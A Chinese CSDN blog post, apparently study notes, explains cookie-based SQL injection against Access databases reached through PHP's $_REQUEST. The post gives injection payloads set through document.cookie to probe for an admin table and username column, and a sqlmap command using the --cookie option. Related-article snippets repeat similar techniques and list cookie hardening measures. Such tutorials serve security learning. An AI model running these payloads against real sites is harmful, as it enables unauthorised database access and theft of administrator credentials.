Access — Cookie注入

最新推荐文章于 2024-07-23 12:36:06 发布
最新推荐文章于 2024-07-23 12:36:06 发布
阅读量248 收藏
点赞数
分类专栏: 渗透原理篇 文章标签: 前端 java 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/126909358
版权

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

一、Cookie注入简介

此处Cookie注入的条件

        在php中$_REQUEST[]接受传参的时候,接收post、get、cookie传参从而导致cookie注入

        php<5.4        接受cookie传参

二、怎么修改Cookie

        1.抓包修改Cookie值

        2.控制台输入Cookie值

                document.cookie="id="+escape("语句")

                document.cookie        是用来设置cookie的

                Cookie名字为id

                escape        是一个编码函数,这个函数会进行URL编码

        3.F12 -> 储存  -> cookie

三、Cookie注入步骤(Access数据库)

        URL栏接受数据的时候先接受RUL栏中的传参,然后再接收cookie里的传参,所以在注入的时候应该清空URL栏的传参,在回车

方法一:

        不知道表名,我们可以猜admin表是否存在(burp跑sqlmap下的data文的txt)

       document.cookie="id="+escape("666  and  exists( select * from  admin)")

        不知道字段名,我们可以猜username字段是否存在admin表中

        document.cookie="id="+escape("666  and  exists(select  username from admin)")

        找显错位

        document.cookie="id="+escape()

方法二:

        python sqlmap.py  -u  "https://127.0.0.1/xxx.php"  --cookie  "sb=123"  --level 3 -- risk 2

-batch

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Access数据库---Cookie注入
Y22Lee的博客
03-22 197
Cookie就是代表你身份的字符串,网站根据Cookie来识别你是谁!假如你获取了管理员的Cookie,你可以无需密码直接登录管理员账号。但是有的网站开发人员考虑到安全问题,会给cookie上时限。例如:有的网站我们在第一次输入密码登录后,即使你把游览器关闭了,在cookie未失效期间登陆网站都是不需要输入密码的!一般是半个小时,有的会更短(10分钟的也遇到过)!
Access-Cookie注入(笔记)
weixin_45291045的博客
01-16 131
cookie注入的本质 当某个get或post里的参数存在sql注入,但是被过滤了很多sql函数无法进行注入,如果不是用GET或POST进行传参用的是$_REQUEST函数来传参,REQUEST支持get,post,cookie传参(php 5.4以上版本不在支持cookie传参),如果只对get和post进行了过滤,而cookie的传参并没有过滤,那么就会产生危害,相当于无任何防护。 cookie注入的核心是传参的方式不同 如: 这是一个cookie注入的靶场 常规流程 -1测试是否存在注入,页面产生了
渗透测试之数据库注入——cookie注入
weixin_48803011的博客
12-13 684
cookie注入就是数据库注入的一种;cookie会记录我们的一些信息以方便我们的体验更佳。但这也给网站造成了一定的风险。
web安全Day02:Cookie注入
坚持硬核
03-05 152
可能出现cookie注入的功能模块: 文章显示模块: 文章的内容都是存在数据库中,点击超连接,然后显示整个文章,通常需要将文章id传参,然后数据库中查询。有些开发为了同时能接受get 和post传参,在后台用$_REQUEST来接受id,这就导致,cookie传参也可以被$_REQUEST接收到。而有些waf通常对get post非法传参做了防护,而对cookie传参么有防护。 等凡是接受c...
快速获取cookie的两种方式
热门推荐
vocalsir的博客
11-28 3万+
在需要获取cookie的时候有没有十分方便高效的方式呢?我通过自己实践总结了两种获取cookie比较实用的方式。
Access数据库注入cookie注入
seek_2022的博客
05-02 1721
文章目录一、cookie注入简介(一)什么是cookie(二)为什么会存在cookie注入?二、如何修改cookie(一)通过Javascript来设置Cookie(二)通过浏览器的Application来修改(三)通过burp抓包去修改cookie(四)通过浏览器插件进行修改三、cookie注入靶场思路(一)靶场需要注意的地方(二)如何删除GET传参(三)access数据库注入的特点四、靶场实战(一)测试cookie传参(二)测试cookie注入(三)爆破表名(四)判断字段数(五)判断显错位(六)查询ad
Access——Cookie注入
qq_45300786的博客
07-18 527
这里我们使用cookie来传参的,注意php5.4以上的版本就不会接受cookie传参了 下面我们就在本地服务器来试一试 先写一个php传参文件 然后进行传参,可发现,传参成功。 那么接下来我们就来使用cookie传参 ...
Access注入Cookie注入
白帽黑客八哥的博客
05-30 1399
注:Cookie传参值需要URL编码Cookie 是指某些网站为了辨别用户身份而储存在用户本地终端上的数据(通常经过加密通俗来讲,Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。Cookie 的出现是为了给用户更好的体验性,从安全的角度来讲,Cookie本身就是不安全的。
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1216
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
Access数据库注入高级玩法
03-03
### Access数据库注入高级玩法 #### 知识点概述 本文将深入探讨Access数据库注入的一些高级技巧,包括如何利用SQL注入漏洞获取敏感数据、探索数据库结构等。这些技巧不仅适用于安全测试人员进行渗透测试,同时也为...
Access数据库注入高级玩法.pdf
07-13
Access 数据库注入高级玩法 ...* cookie 注入语句 Access 数据库注入高级玩法是一种高级的数据库攻击技术,旨在攻击 Access 数据库,获取敏感信息。开发者应该注意防止 Access 数据库注入漏洞,保护数据库安全
SQLMAP的注入使用
05-13
该命令用于判断目标网站是否存在Cookie注入漏洞。 3. python SQLmap.py -u "xxxx.com" --data "xx=xx&xx=xx" 【判断url是否存在post注入】 该命令用于判断目标网站是否存在POST注入漏洞。 GET注入详解: * ...
Access数据库注入高级玩法[参考].pdf
10-19
7. **Cookie注入**: - 改变`document.cookie`的值,如`javascript:alert(document.cookie="id="+escape("44 and 1=1"))`,可以尝试注入不同条件来获取Cookie信息。 这些高级技巧展示了Access数据库注入的灵活性,...
ASP+Access安全隐患及对策.rar_asp access
09-24
Access则是Microsoft Office套件中的一个小型数据库管理系统,因其简单易用而被广泛应用于小型企业或个人网站的数据存储。然而,将ASP与Access结合使用时,可能会存在一些安全隐患,以下我们将详细探讨这些风险以及...
Vue使用FullCalendar实现日历/周历/月历
_小郑有点困了的博客
07-23 177
需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 971
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
VUE 子组件可以直接改变父组件的数据吗
Cshaosun的博客
07-23 110
如果子组件需要修改父组件的数据,‌应该通过触发一个自定义事件来通知父组件进行数据的变更。‌父组件在接收到子组件触发的事件后,‌可以修改数据,‌从而间接地改变父组件的数据。‌这种方式通过明确的事件通信机制,‌保证了数据流的单向性和组件之间的解耦。需要注意的是,‌虽然Vue提供了一些特殊的方法来实现子组件修改父组件数据,‌但这种方式打破了数据流的单向性,‌增加了组件之间的耦合性,‌因此应谨慎使用。在Vue中,‌如果确实需要在子组件中修改父组件的数据,‌可以通过以下步骤实现:‌。
Odoo Registry 源码解读:前端世界的魔法师
最新发布
清水欧度 Odoo ERP
07-23 848
它是连接不同模块的桥梁,是实现灵活扩展的关键,是每个Odoo开发魔法师最强大的盟友。下次当你在编写Odoo模块时,请记住,你手中握着的不仅仅是键盘,而是Registry赋予你的魔法杖。想象一下,它就是Odoo世界里的预言球,所有的秘密都逃不过它的法眼。Registry会用它的魔法排序棒,确保每个生物都按照正确的顺序出场,场面蔚为壮观。Registry会把常用的魔法结果记在它的魔法笔记本里,下次再用时就不用重新计算了,节省了大量的魔法能量。Registry设置了强大的防御魔法,确保没有人能破坏它的魔法秩序。
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 636
CTFWP,ctfshow-web42
cookie安全性解决办法
09-09
对于确保 cookie安全性,可以采取以下几种解决办法: 1. 使用 HTTPS 协议:通过使用 HTTPS 加密协议来传输请求和响应,可以防止中间人窃听和篡改的风险,确保数据的安全性。 2. 设置 Secure 标记:在设置 cookie 时,使用 Secure 标记来指示浏览器仅在通过 HTTPS 连接发送请求时才发送该 cookie。这可以防止通过非加密连接发送 cookie,提高其安全性。 3. 设置 HttpOnly 标记:在设置 cookie 时,使用 HttpOnly 标记来禁止 JavaScript 访问该 cookie。这可以防止恶意脚本通过 XSS(跨站脚本攻击)获取用户的 cookie,提高其安全性。 4. 设置 SameSite 标记:在设置 cookie 时,使用 SameSite 标记来限制 cookie 的发送范围。可以设置为 "Strict"、"Lax" 或 "None"。Strict 模式下,cookie 仅在与请求网站具有一致性的情况下发送;Lax 模式下,在某些情况下,例如从外部站点链接访问时,也可以发送;None 模式下,始终发送 cookie。这可以防止 CSRF(跨站请求伪造)攻击。 5. 对敏感信息进行加密处理:如果需要在 cookie 中存储敏感信息,应该先对其进行加密处理,确保即使 cookie 被窃取,也无法直接获取敏感信息。 6. 实施访问控制和身份验证:在服务器端实施访问控制和身份验证机制,确保只有经过验证的用户才能访问敏感功能或数据,从而降低 cookie 被利用的风险。 通过采取这些安全措施,可以增加 cookie安全性,减少潜在的攻击风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值